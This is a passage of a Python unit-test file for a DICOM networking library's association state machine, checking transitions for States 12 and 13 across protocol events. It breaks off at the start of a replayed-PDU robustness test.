# Sta12 + Evt7 -> <ignore> -> Sta12
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt7'
]
def test_evt08(self):
"""Test Sta12 + Evt8."""
# Sta12 + Evt8 -> <ignore> -> Sta12
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt8'
]
def test_evt09(self):
"""Test Sta12 + Evt9."""
# Sta12 + Evt9 -> <ignore> -> Sta12
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt9'
]
def test_evt10(self):
"""Test Sta12 + Evt10."""
# Sta12 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', p_data_tf), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt10', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt10'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta12 + Evt11."""
# Sta12 + Evt11 -> <ignore> -> Sta12
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt11'
]
def test_evt12(self):
"""Test Sta12 + Evt12."""
# Sta12 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_release_rq), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt12', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt12'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta12 + Evt13."""
# Sta12 + Evt13 -> AA-8 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_release_rp), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt13', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt13'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta12 + Evt14."""
# Sta12 + Evt14 -> AR-4 -> Sta12
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-4: Issue A-RELEASE-RP PDU and start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('recv', None), # recv a-release-rp
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt14', 'AR-4'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt14'
]
assert scp.handlers[0].received[2] == (
b'\x06\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt15(self):
"""Test Sta12 + Evt15."""
# Sta12 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt15', 'AA-1'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt15'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta12 + Evt16."""
# Sta12 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_abort), # trigger event
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt16', 'AA-3'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt16'
]
def test_evt17(self):
"""Test Sta12 + Evt17."""
# Sta12 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt17', 'AA-4'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt17'
]
def test_evt18(self):
"""Test Sta12 + Evt18."""
# Sta12 + Evt18 -> <ignore> -> Sta12
# Evt18: ARTIM timer expired from <local service>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt18'
]
def test_evt19(self):
"""Test Sta12 + Evt19."""
# Sta12 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt19', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt19'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState13(TestStateBase):
"""Tests for State 13: Waiting for connection closed."""
def move_to_state(self, assoc, scp):
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
assoc.acse.send_request()
assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
if assoc.dul.socket and assoc.dul.socket.ready:
assoc.dul._read_pdu_data()
return True
return False
return orig_method()
assoc.dul._is_transport_event = patch_xport_event
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta13')
def test_evt01(self):
"""Test Sta13 + Evt1."""
# Sta13 + Evt1 -> <ignore> -> Sta13
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
self.assoc.dul.socket.close()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta13 + Evt2."""
# Sta13 + Evt2 -> <ignore> -> Sta13
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta13 + Evt3."""
# Sta13 + Evt3 -> AA-6 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_rq),
('send', a_associate_ac),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
self.assoc.dul.socket.close()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt3', 'AA-6'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt3']
def test_evt04(self):
"""Test Sta13 + Evt4."""
# Sta13 + Evt4 -> AA-6 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_rq),
('send', a_associate_rj),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt4', 'AA-6'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta13 + Evt5."""
# Sta13 + Evt5 -> <ignore> -> Sta13
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta13 + Evt6."""
# Sta13 + Evt6 -> AA-7 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-7: Send A-ABORT PDU to <remote>
commands = [
('recv', None),
('send', a_associate_rq),
('send', a_associate_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt6', 'AA-7'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt6']
def test_evt07(self):
"""Test Sta13 + Evt7."""
# Sta13 + Evt7 -> <ignore> -> Sta13
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt7']
def test_evt08(self):
"""Test Sta13 + Evt8."""
# Sta13 + Evt8 -> <ignore> -> Sta13
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt8']
def test_evt09(self):
"""Test Sta13 + Evt9."""
# Sta13 + Evt9 -> <ignore> -> Sta13
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt9']
def test_evt10(self):
"""Test Sta13 + Evt10."""
# Sta13 + Evt10 -> AA-6 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_rq),
('send', p_data_tf),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt10', 'AA-6'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt10']
def test_evt11(self):
"""Test Sta13 + Evt11."""
# Sta13 + Evt11 -> <ignore> -> Sta13
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt11']
def test_evt12(self):
"""Test Sta13 + Evt12."""
# Sta13 + Evt12 -> AA-6 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_rq),
('send', a_release_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt12', 'AA-6'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt12']
def test_evt13(self):
"""Test Sta13 + Evt13."""
# Sta13 + Evt13 -> AA-6 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_rq),
('send', a_release_rp),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt13', 'AA-6'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt13']
def test_evt14(self):
"""Test Sta13 + Evt14."""
# Sta13 + Evt14 -> <ignore> -> Sta13
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt14']
def test_evt15(self):
"""Test Sta13 + Evt15."""
# Sta13 + Evt15 -> <ignore> -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt15']
def test_evt16(self):
"""Test Sta13 + Evt16."""
# Sta13 + Evt16 -> AA-2 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-2: Stop ARTIM, close connection
commands = [
('recv', None),
('send', a_associate_rq),
('send', a_abort),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt16', 'AA-2'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt16']
def test_evt17(self):
"""Test Sta13 + Evt17."""
# Sta13 + Evt17 -> AR-5 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AR-5: Stop ARTIM
commands = [
('recv', None),
('send', a_associate_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt17', 'AR-5'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt17']
def test_evt18(self):
"""Test Sta13 + Evt18."""
# Sta13 + Evt18 -> AA-2 -> Sta1
# Evt18: ARTIM timer expired from <local service>
# AA-2: Stop ARTIM, close connection
commands = [
('recv', None),
('send', a_associate_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt18', 'AA-2'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt18']
def test_evt19(self):
"""Test Sta13 + Evt19."""
# Sta13 + Evt19 -> AA-7 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-7: Send A-ABORT PDU to <remote>
commands = [
('recv', None),
('send', a_associate_rq),
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt19', 'AA-7'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt19']
class TestParrotAttack(TestStateBase):
"""Test a parrot attack on the association."""
def test_requestor(self):
commands = [
('recv', None),
('send', a_associate_ac),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', a_release_rq),
('exit', None)
]
